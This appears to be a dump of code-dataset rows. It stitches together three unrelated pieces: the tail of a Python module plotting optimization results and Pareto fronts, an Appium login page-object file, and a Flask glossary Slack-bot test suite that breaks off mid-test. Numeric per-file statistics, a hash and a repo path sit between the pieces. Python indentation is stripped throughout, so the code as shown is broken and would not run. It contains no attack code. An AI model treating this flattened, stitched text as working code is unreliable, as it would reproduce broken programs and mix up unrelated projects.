'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.contourf(x,y,c,cmap=pylab.cm.rainbow)
# ax.imshow(c)
# ax.pcolor(x,y,c)
# ax.scatter(x,y,c=c)
ax.plot(x_pop,y_pop,'xk',label='final simplex')
ax.plot(x_pop[0],y_pop[0],'or',label='best vertex')
x_true = parameters[0].true_value
y_true = parameters[1].true_value
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.legend()
return fig, ax
def plot_pareto_front( optimization_result ):
"""
The function `plot_pareto_front` function inside the optimization_plots
module visualizes the final population of a GA result as obtained via the
optimization.MOCGA module and highlights the obtained Pareto front.
"""
if not (isinstance(optimization_result,MOCGA.Population)):
warnings.warn('Please use the MOCGA class.')
f = optimization_result.config['objective_function']
if f.objective_dimension == 2:
return _plot_pareto_front2D( optimization_result )
elif f.objective_dimension == 3:
return _plot_pareto_front3D( optimization_result )
else:
warnings.warn('Only multi objective functions with two or three objectives are supported.')
return
def _plot_pareto_front2D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [-ind.fitness[0] for ind in optimization_result.archive]
y = [-ind.fitness[1] for ind in optimization_result.archive]
ix = np.lexsort((x,y,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
# xx = [ind.genes[0].value for ind in optimization_result.archive]
# xxs0 = [('%.2f' % xx[jx]) for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs0,ys0,'-r',label='Pareto front')
# for ix in list(range(len(xxs0))):
# ax.text(xs0[ix],ys0[ix],xxs0[ix])
# ax.plot(xs0,ys0,'og',label='Pareto front')
ax.plot(xs,ys,'xk',label='final archive')
ax.set_xlabel('f1')
ax.set_ylabel('f2')
ax.grid()
ax.legend()
return fig, ax
def _plot_pareto_front3D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [-ind.fitness[0] for ind in optimization_result.archive]
y = [-ind.fitness[1] for ind in optimization_result.archive]
z = [-ind.fitness[2] for ind in optimization_result.archive]
ix = np.lexsort((x,y,z,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
zs = [z[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
zs0 = [z[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig = pylab.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(xs0,ys0,zs0,'-r',label='Pareto front')
ax.plot(xs,ys,zs,'xk',label='final archive')
ax.set_xlabel('f1')
ax.set_ylabel('f2')
ax.set_zlabel('f3')
ax.grid()
ax.legend()
return fig, ax
def plot_pareto_set( optimization_result ):
"""
The function `plot_pareto_set` function inside the optimization_plots
module visualizes the final population of a GA result as obtained via the
optimization.MOCGA module and highlights the obtained Pareto set.
"""
if not (isinstance(optimization_result,MOCGA.Population)):
warnings.warn('Please use the MOCGA class.')
f = optimization_result.config['objective_function']
if f.dimension == 1:
return _plot_pareto_set1D( optimization_result )
elif f.dimension == 2:
return _plot_pareto_set2D( optimization_result )
elif f.dimension == 3:
return _plot_pareto_set3D( optimization_result )
else:
warnings.warn('Only multi objective functions with one, two or three dimensions are supported.')
return
def _plot_pareto_set1D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [ind.genes[0].value for ind in optimization_result.archive]
y = [ind.genes[0].value for ind in optimization_result.archive]
ix = np.lexsort((x,y,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs0,ys0,'or',label='Pareto set')
ax.plot(xs,ys,'xk',label='final archive')
ax.set_xlabel('x')
ax.set_ylabel('x')
ax.grid()
ax.legend()
return fig, ax
def _plot_pareto_set2D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [ind.genes[0].value for ind in optimization_result.archive]
y = [ind.genes[1].value for ind in optimization_result.archive]
ix = np.lexsort((x,y,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs0,ys0,'or',label='Pareto set')
ax.plot(xs,ys,'xk',label='final archive')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.grid()
ax.legend()
return fig, ax
def _plot_pareto_set3D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [ind.genes[0].value for ind in optimization_result.archive]
y = [ind.genes[1].value for ind in optimization_result.archive]
z = [ind.genes[2].value for ind in optimization_result.archive]
ix = np.lexsort((x,y,z,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
zs = [z[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
zs0 = [z[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig = pylab.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(xs0,ys0,zs0,'-r',label='Pareto set')
ax.plot(xs,ys,zs,'xk',label='final archive')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
ax.grid()
ax.legend()
return fig, ax
| 34.458589
| 114
| 0.607825
| 3,071
| 22,467
| 4.337349
| 0.074569
| 0.101351
| 0.01997
| 0.025676
| 0.937838
| 0.906081
| 0.871396
| 0.849474
| 0.835135
| 0.814114
| 0
| 0.020561
| 0.248809
| 22,467
| 651
| 115
| 34.511521
| 0.768679
| 0.083589
| 0
| 0.857895
| 0
| 0
| 0.169279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0
| 0.019298
| 0
| 0.094737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4abcefa975f4ec814f0ffafef38c6be450bc80ea
| 1,725
|
py
|
Python
|
App/LoginPage.py
|
tartaruswh/SaaSCyberWaterSupplyGWAuto
|
07b43c67e059a5b602957d94e9f441e74d12bde1
|
[
"Apache-2.0"
] | null | null | null |
App/LoginPage.py
|
tartaruswh/SaaSCyberWaterSupplyGWAuto
|
07b43c67e059a5b602957d94e9f441e74d12bde1
|
[
"Apache-2.0"
] | null | null | null |
App/LoginPage.py
|
tartaruswh/SaaSCyberWaterSupplyGWAuto
|
07b43c67e059a5b602957d94e9f441e74d12bde1
|
[
"Apache-2.0"
] | null | null | null |
import time
import pytest
from appium.webdriver.common.mobileby import MobileBy
from App.AccountPasswordPage import AccountPasswordPage
from App.BasePage import BasePage
class LoginPage(BasePage):
#点击账号密码吗登录按钮,跳转到账号密码登录界面
def goto_accountPasswordPage(self):
time.sleep(2)
#点击账号密码登录按钮,跳转到账号密码登录界面
self.find(MobileBy.XPATH,'/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/'
'android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.webkit.WebView/android.webkit.WebView/android.view.View[8]').click()
#time.sleep(2)
# # 等待账号密码登录界面"公司"名称显示
# self.cf_webDriverWaitUnitlIsDisplayed(MobileBy.XPATH,
# "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/"
# "android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.webkit.WebView/android.webkit.WebView/android.view.View[3]")
# 验证账号密码登录界面“公司”名称是否显示正确
# pytest.assume(self.find(MobileBy.XPATH,
# "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/"
# "android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.webkit.WebView/android.webkit.WebView/android.view.View[3]").text == "公司")
return AccountPasswordPage(self.getDriver())
| 61.607143
| 197
| 0.706087
| 171
| 1,725
| 7.111111
| 0.269006
| 0.224507
| 0.296053
| 0.382401
| 0.67352
| 0.67352
| 0.67352
| 0.67352
| 0.67352
| 0.67352
| 0
| 0.003561
| 0.186087
| 1,725
| 27
| 198
| 63.888889
| 0.862536
| 0.538551
| 0
| 0
| 0
| 0.181818
| 0.371648
| 0.371648
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.272727
| 0.454545
| 0
| 0.727273
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
4ac57d79f17cecd6cc886b5e0f5abe55924b11ad
| 38,299
|
py
|
Python
|
tests/test_bot.py
|
toptal/glossary-bot
|
33e8c7fdfd7c1675af27beba7cf534e8bffe60d6
|
[
"MIT"
] | 2
|
2019-07-12T10:51:18.000Z
|
2020-02-22T09:09:17.000Z
|
tests/test_bot.py
|
toptal/glossary-bot
|
33e8c7fdfd7c1675af27beba7cf534e8bffe60d6
|
[
"MIT"
] | null | null | null |
tests/test_bot.py
|
toptal/glossary-bot
|
33e8c7fdfd7c1675af27beba7cf534e8bffe60d6
|
[
"MIT"
] | 1
|
2020-01-09T16:16:34.000Z
|
2020-01-09T16:16:34.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import unittest
import json
from httmock import response, HTTMock
from flask import current_app
from gloss.models import Definition, Interaction
from gloss.views import query_definition
from datetime import datetime, timedelta
from tests.test_base import TestBase
class TestBot(TestBase):
def setUp(self):
super(TestBot, self).setUp()
self.db.create_all()
def test_app_exists(self):
''' The app exists
'''
self.assertFalse(current_app is None)
def test_unauthorized_access(self):
''' The app rejects unauthorized access
'''
robo_response = self.client.post('/', data={'token': 'woofer_token'})
self.assertEqual(robo_response.status_code, 401)
def test_authorized_access(self):
''' The app accepts authorized access
'''
robo_response = self.post_command(text=u'')
self.assertEqual(robo_response.status_code, 200)
def test_set_definition(self):
''' A definition set via a POST is recorded in the database
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
def test_set_definition_with_lots_of_whitespace(self):
''' Excess whitespace is trimmed when parsing the set command.
'''
robo_response = self.post_command(text=u' EW = Eligibility Worker ')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
def test_set_definition_with_multiple_equals_signs(self):
''' A set with multiple equals signs considers all equals signs after
the first to be part of the definition
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker = Cool Person=Yeah')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker = Cool Person=Yeah')
def test_reset_definition(self):
''' Setting a definition for an existing term overwrites the original
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
robo_response = self.post_command(text=u'EW = Egg Weathervane')
self.assertTrue(u'overwriting the previous entry' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Egg Weathervane')
def test_set_same_word_with_different_capitalization(self):
''' We can't set different definitions for the same word by using different cases
'''
robo_response = self.post_command(text=u'lower case = NOT UPPER CASE')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'lower case'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'lower case')
self.assertEqual(definition_check.definition, u'NOT UPPER CASE')
robo_response = self.post_command(text=u'LOWER CASE = really not upper case')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'overwriting the previous entry' in robo_response.data)
def test_set_identical_definition(self):
''' Correct response for setting an identical definition for an existing term
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'already knows that the definition for' in robo_response.data)
def test_set_command_word_definitions(self):
''' We can successfull set and get definitions for unreserved command words.
'''
robo_response = self.post_command(text=u'SHH = Sonic Hedge Hog')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'SHH'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'SHH')
self.assertEqual(definition_check.definition, u'Sonic Hedge Hog')
robo_response = self.post_command(text=u'SSH = Secure SHell')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'SSH'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'SSH')
self.assertEqual(definition_check.definition, u'Secure SHell')
robo_response = self.post_command(text=u'Delete = Remove or Obliterate')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'Delete'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'Delete')
self.assertEqual(definition_check.definition, u'Remove or Obliterate')
robo_response = self.post_command(text=u'help me = I\'m in hell')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'help me'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'help me')
self.assertEqual(definition_check.definition, u'I\'m in hell')
def test_failed_set_command_word_definitions(self):
''' We can't successfully set and get definitions for reserved command words.
'''
robo_response = self.post_command(text=u'Stats = Statistics')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
robo_response = self.post_command(text=u'help = aid')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
robo_response = self.post_command(text=u'LeArNiNgS = recently')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
robo_response = self.post_command(text=u'? = riddle me this')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
def test_get_definition(self):
''' We can succesfully set and get a definition from the bot
'''
# set & test a definition
self.post_command(text=u'EW = Eligibility Worker')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss EW' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertEqual(attachment['title'], u'EW')
self.assertEqual(attachment['text'], u'Eligibility Worker')
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request the definition
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
# the request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'found')
def test_get_definition_with_special_characters(self):
''' We can succesfully set and get a definition with special characters from the bot
'''
# set & test a definition
self.post_command(text=u'EW = ™¥∑ø∂∆∫')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'™¥∑ø∂∆∫')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss EW' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertEqual(attachment['title'], u'EW')
self.assertEqual(attachment['text'], u'™¥∑ø∂∆∫')
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request the definition
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
# the request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'found')
def test_request_nonexistent_definition(self):
''' Test requesting a non-existent definition
'''
# send a POST to the bot to request the definition
robo_response = self.post_command(text=u'EW')
self.assertTrue(u'has no definition for' in robo_response.data)
# the request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'not_found')
def test_get_definition_with_image(self):
''' We can get a properly formatted definition with an image from the bot
'''
# set & test a definition
self.post_command(text=u'EW = http://example.com/ew.gif')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'http://example.com/ew.gif')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss EW' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertEqual(attachment['title'], u'EW')
self.assertEqual(attachment['text'], u'http://example.com/ew.gif')
self.assertEqual(attachment['image_url'], u'http://example.com/ew.gif')
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request the definition
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_delete_definition(self):
''' A definition can be deleted from the database
'''
# first set a value in the database and verify that it's there
self.post_command(text=u'EW = Eligibility Worker')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
# now delete the value and verify that it's gone
robo_response = self.post_command(text=u'delete EW')
self.assertTrue(u'has deleted the definition for' in robo_response.data)
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNone(definition_check)
def test_get_stats(self):
''' Stats are properly returned by the bot
'''
# set and get a definition to generate some stats
self.post_command(text=u'EW = Eligibility Worker')
self.post_command(text=u'EW')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss stats' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNotNone(attachment['title'])
self.assertTrue(u'I have definitions for 1 term' in attachment['text'])
self.assertTrue(u'1 person has defined terms' in attachment['text'])
self.assertTrue(u'I\'ve been asked for definitions 1 time' in attachment['text'])
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'stats')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_get_stats_on_empty_database(self):
''' A coherent message is returned when requesting stats on an empty database
'''
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss stats' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNotNone(attachment['title'])
self.assertTrue(u'I don\'t have any definitions' in attachment['text'])
self.assertTrue(u'Nobody has defined terms' in attachment['text'])
self.assertTrue(u'Nobody has asked me for definitions' in attachment['text'])
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'stats')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_get_learnings(self):
''' Learnings are properly returned by the bot
'''
# set some values in the database
letters = [u'K', u'L', u'M', u'N', u'Ó', u'P', u'Q', u'R', u'S', u'T', u'U', u'V']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss learnings' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNotNone(attachment['title'])
self.assertTrue(u'I recently learned definitions for' in attachment['text'])
self.assertTrue(u'KW' in attachment['text'])
self.assertTrue(u'LW' in attachment['text'])
self.assertTrue(u'MW' in attachment['text'])
self.assertTrue(u'NW' in attachment['text'])
self.assertTrue(u'ÓW' in attachment['text'])
self.assertTrue(u'PW' in attachment['text'])
self.assertTrue(u'QW' in attachment['text'])
self.assertTrue(u'RW' in attachment['text'])
self.assertTrue(u'SW' in attachment['text'])
self.assertTrue(u'TW' in attachment['text'])
self.assertTrue(u'UW' in attachment['text'])
self.assertTrue(u'VW' in attachment['text'])
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request learnings
with HTTMock(response_content):
fake_response = self.post_command(text=u'learnings')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_random_learnings(self):
''' Learnings are returned in random order when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
# get chronological learnings
robo_response = self.post_command(text=u'shh learnings')
self.assertEqual(robo_response.status_code, 200)
control = robo_response.data
# get a few random learnings
robo_response = self.post_command(text=u'shh learnings random')
self.assertEqual(robo_response.status_code, 200)
random1 = robo_response.data
robo_response = self.post_command(text=u'shh learnings random')
self.assertEqual(robo_response.status_code, 200)
random2 = robo_response.data
robo_response = self.post_command(text=u'shh learnings random')
self.assertEqual(robo_response.status_code, 200)
random3 = robo_response.data
# if they're all equal, we've failed
self.assertFalse(control == random1 and control == random2 and control == random3)
def test_alphabetical_learnings(self):
''' Learnings are returned in random order when requested
'''
# set some values in the database
letters = [u'E', u'G', u'I', u'K', u'M', u'O', u'Q', u'S', u'R', u'P', u'N', u'L', u'J', u'H', u'F']
check = []
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
check.insert(0, u'{}W'.format(letter))
desc_check = check[:12]
alpha_check = list(check)
alpha_check.sort()
alpha_check = alpha_check[:12]
# get chronological learnings
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
# get alphabetical learnings
robo_response = self.post_command(text=u'learnings alpha')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(alpha_check) in robo_response.data)
def test_random_offset_learnings(self):
''' An offset group of learnings are returned randomized
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
# get chronological learnings
robo_response = self.post_command(text=u'learnings 7 4')
self.assertEqual(robo_response.status_code, 200)
control = robo_response.data
# get a list of the terms from the control string
check_terms = control.split(', ')
check_terms[0] = check_terms[0][-2:]
# get a few random learnings
robo_response = self.post_command(text=u'learnings random 7 4')
self.assertEqual(robo_response.status_code, 200)
random1 = robo_response.data
robo_response = self.post_command(text=u'learnings random 7 4')
self.assertEqual(robo_response.status_code, 200)
random2 = robo_response.data
robo_response = self.post_command(text=u'learnings random 7 4')
self.assertEqual(robo_response.status_code, 200)
random3 = robo_response.data
# if they're all equal, we've failed
self.assertFalse(control == random1 and control == random2 and control == random3)
# but they should all have the same elements
